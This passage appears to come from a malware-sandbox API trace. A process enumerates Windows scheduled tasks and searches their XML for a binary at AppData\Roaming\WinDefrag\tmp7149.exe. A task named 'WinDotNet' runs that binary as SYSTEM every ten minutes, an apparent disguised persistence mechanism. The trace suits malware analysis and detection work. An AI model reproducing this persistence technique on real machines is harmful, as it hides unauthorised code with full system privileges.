1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.316] IUnknown:Release (This=0x326990) returned 0x0 [0169.316] IRegisteredTaskCollection:get_Item (in: This=0x3267f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x18e6e8 | out: ppRegisteredTask=0x18e6e8*=0x326990) returned 0x0 [0169.316] IRegisteredTask:get_Name (in: This=0x326990, pName=0x18e6e0 | out: pName=0x18e6e0*="WinDotNet") returned 0x0 [0169.316] IRegisteredTask:get_Xml (in: This=0x326990, pXml=0x18e6d0 | out: pXml=0x18e6d0*="\r\n\r\n \r\n 1.0.1\r\n WinDotNet\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT10M\r\n P415DT15H58M\r\n false\r\n \r\n 2018-12-06T22:29:28\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\r\n \r\n \r\n") returned 0x0 [0169.320] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0.1\r\n WinDotNet\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT10M\r\n P415DT15H58M\r\n false\r\n \r\n 2018-12-06T22:29:28\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\r\n \r\n \r\n" [0169.320] lstrcmpW (lpString1="WinDotNet", lpString2="WinDotNet") returned 0 [0169.320] IUnknown:Release (This=0x326990) returned 0x0 [0169.320] IUnknown:Release (This=0x3267f0) returned 0x0 [0169.320] ITaskFolder:GetFolders (in: This=0x3267a0, flags=0, ppFolders=0x18e6d8 | out: ppFolders=0x18e6d8*=0x3268f0) returned 0x0 [0169.325] ITaskFolderCollection:get_Count (in: This=0x3268f0, pCount=0x18e858 | out: pCount=0x18e858*=3) returned 0x0 [0169.325] ITaskFolderCollection:get_Item (in: This=0x3268f0, index=0x18e720*(varType=0x3, wReserved1=0x39, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x18e6d0 | out: ppFolder=0x18e6d0*=0x3269a0) returned 0x0 [0169.325] ITaskFolder:GetTasks (in: This=0x3269a0, flags=1, ppTasks=0x18e560 | out: ppTasks=0x18e560*=0x326a10) returned 0x0 [0169.326] IRegisteredTaskCollection:get_Count (in: This=0x326a10, pCount=0x18e6b0 | out: pCount=0x18e6b0*=0) returned 0x0 [0169.326] IUnknown:Release (This=0x326a10) returned 0x0 [0169.326] ITaskFolder:GetFolders (in: This=0x3269a0, flags=0, ppFolders=0x18e548 | out: ppFolders=0x18e548*=0x326a10) returned 0x0 [0169.329] ITaskFolderCollection:get_Count (in: This=0x326a10, pCount=0x18e6c8 | out: pCount=0x18e6c8*=3) returned 0x0 [0169.329] ITaskFolderCollection:get_Item (in: This=0x326a10, index=0x18e590*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x18e540 | out: ppFolder=0x18e540*=0x326b50) returned 0x0 [0169.329] ITaskFolder:GetTasks (in: This=0x326b50, flags=1, ppTasks=0x18e3d0 | out: ppTasks=0x18e3d0*=0x326bd0) returned 0x0 [0169.338] IRegisteredTaskCollection:get_Count (in: This=0x326bd0, pCount=0x18e520 | out: pCount=0x18e520*=6) returned 0x0 [0169.338] IRegisteredTaskCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e3c8 | out: ppRegisteredTask=0x18e3c8*=0x328050) returned 0x0 [0169.338] IRegisteredTask:get_Name (in: This=0x328050, pName=0x18e3c0 | out: pName=0x18e3c0*="Office Automatic Updates") returned 0x0 [0169.338] IRegisteredTask:get_Xml (in: This=0x328050, pXml=0x18e3b0 | out: pXml=0x18e3b0*="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n") returned 0x0 [0169.341] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.341] IUnknown:Release (This=0x328050) returned 0x0 [0169.341] IRegisteredTaskCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e3c8 | out: ppRegisteredTask=0x18e3c8*=0x328050) returned 0x0 [0169.341] IRegisteredTask:get_Name (in: This=0x328050, pName=0x18e3c0 | out: pName=0x18e3c0*="Office ClickToRun Service Monitor") returned 0x0 [0169.341] IRegisteredTask:get_Xml (in: This=0x328050, pXml=0x18e3b0 | out: pXml=0x18e3b0*="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n") returned 0x0 [0169.344] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.344] IUnknown:Release (This=0x328050) returned 0x0 [0169.344] IRegisteredTaskCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x18e3c8 | out: ppRegisteredTask=0x18e3c8*=0x328050) returned 0x0 [0169.344] IRegisteredTask:get_Name (in: This=0x328050, pName=0x18e3c0 | out: pName=0x18e3c0*="OfficeBackgroundTaskHandlerLogon") returned 0x0 [0169.344] IRegisteredTask:get_Xml (in: This=0x328050, pXml=0x18e3b0 | out: pXml=0x18e3b0*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0169.364] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.364] IUnknown:Release (This=0x328050) returned 0x0 [0169.364] IRegisteredTaskCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x18e3c8 | out: ppRegisteredTask=0x18e3c8*=0x328050) returned 0x0 [0169.364] IRegisteredTask:get_Name (in: This=0x328050, pName=0x18e3c0 | out: pName=0x18e3c0*="OfficeBackgroundTaskHandlerRegistration") returned 0x0 [0169.364] IRegisteredTask:get_Xml (in: This=0x328050, pXml=0x18e3b0 | out: pXml=0x18e3b0*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0169.367] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.368] IUnknown:Release (This=0x328050) returned 0x0 [0169.368] IRegisteredTaskCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x18e3c8 | out: ppRegisteredTask=0x18e3c8*=0x328050) returned 0x0 [0169.368] IRegisteredTask:get_Name (in: This=0x328050, pName=0x18e3c0 | out: pName=0x18e3c0*="OfficeTelemetryAgentFallBack2016") returned 0x0 [0169.368] IRegisteredTask:get_Xml (in: This=0x328050, pXml=0x18e3b0 | out: pXml=0x18e3b0*="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n") returned 0x0 [0169.370] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.370] IUnknown:Release (This=0x328050) returned 0x0 [0169.370] IRegisteredTaskCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x18e3c8 | out: ppRegisteredTask=0x18e3c8*=0x328050) returned 0x0 [0169.370] IRegisteredTask:get_Name (in: This=0x328050, pName=0x18e3c0 | out: pName=0x18e3c0*="OfficeTelemetryAgentLogOn2016") returned 0x0 [0169.370] IRegisteredTask:get_Xml (in: This=0x328050, pXml=0x18e3b0 | out: pXml=0x18e3b0*="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n") returned 0x0 [0169.372] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.372] IUnknown:Release (This=0x328050) returned 0x0 [0169.372] IUnknown:Release (This=0x326bd0) returned 0x0 [0169.373] ITaskFolder:GetFolders (in: This=0x326b50, flags=0, ppFolders=0x18e3b8 | out: ppFolders=0x18e3b8*=0x326bd0) returned 0x0 [0169.374] ITaskFolderCollection:get_Count (in: This=0x326bd0, pCount=0x18e538 | out: pCount=0x18e538*=0) returned 0x0 [0169.374] IUnknown:Release (This=0x326bd0) returned 0x0 [0169.374] TaskScheduler:IUnknown:Release (This=0x326b50) returned 0x0 [0169.374] ITaskFolderCollection:get_Item (in: This=0x326a10, index=0x18e590*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x18e540 | out: ppFolder=0x18e540*=0x326b50) returned 0x0 [0169.374] ITaskFolder:GetTasks (in: This=0x326b50, flags=1, ppTasks=0x18e3d0 | out: ppTasks=0x18e3d0*=0x326bd0) returned 0x0 [0169.377] IRegisteredTaskCollection:get_Count (in: This=0x326bd0, pCount=0x18e520 | out: pCount=0x18e520*=0) returned 0x0 [0169.377] IUnknown:Release (This=0x326bd0) returned 0x0 [0169.377] ITaskFolder:GetFolders (in: This=0x326b50, flags=0, ppFolders=0x18e3b8 | out: ppFolders=0x18e3b8*=0x326bd0) returned 0x0 [0169.421] ITaskFolderCollection:get_Count (in: This=0x326bd0, pCount=0x18e538 | out: pCount=0x18e538*=45) returned 0x0 [0169.421] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.421] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x328140) returned 0x0 [0169.425] IRegisteredTaskCollection:get_Count (in: This=0x328140, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.425] IRegisteredTaskCollection:get_Item (in: This=0x328140, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x3282e0) returned 0x0 [0169.426] IRegisteredTask:get_Name (in: This=0x3282e0, pName=0x18e230 | out: pName=0x18e230*="AD RMS Rights Policy Template Management (Automated)") returned 0x0 [0169.426] IRegisteredTask:get_Xml (in: This=0x3282e0, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n") returned 0x0 [0169.431] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.432] IUnknown:Release (This=0x3282e0) returned 0x0 [0169.432] IRegisteredTaskCollection:get_Item (in: This=0x328140, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x3282e0) returned 0x0 [0169.432] IRegisteredTask:get_Name (in: This=0x3282e0, pName=0x18e230 | out: pName=0x18e230*="AD RMS Rights Policy Template Management (Manual)") returned 0x0 [0169.432] IRegisteredTask:get_Xml (in: This=0x3282e0, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n") returned 0x0 [0169.436] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.437] IUnknown:Release (This=0x3282e0) returned 0x0 [0169.437] IUnknown:Release (This=0x328140) returned 0x0 [0169.437] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328140) returned 0x0 [0169.438] ITaskFolderCollection:get_Count (in: This=0x328140, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.438] IUnknown:Release (This=0x328140) returned 0x0 [0169.438] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.438] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.438] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.441] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.441] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.441] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="PolicyConverter") returned 0x0 [0169.441] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n") returned 0x0 [0169.445] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.445] IUnknown:Release (This=0x328230) returned 0x0 [0169.445] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.445] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="VerifiedPublisherCertStoreCheck") returned 0x0 [0169.445] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n") returned 0x0 [0169.448] StrStrIW (lpFirst="\r\n\r\n \r\n 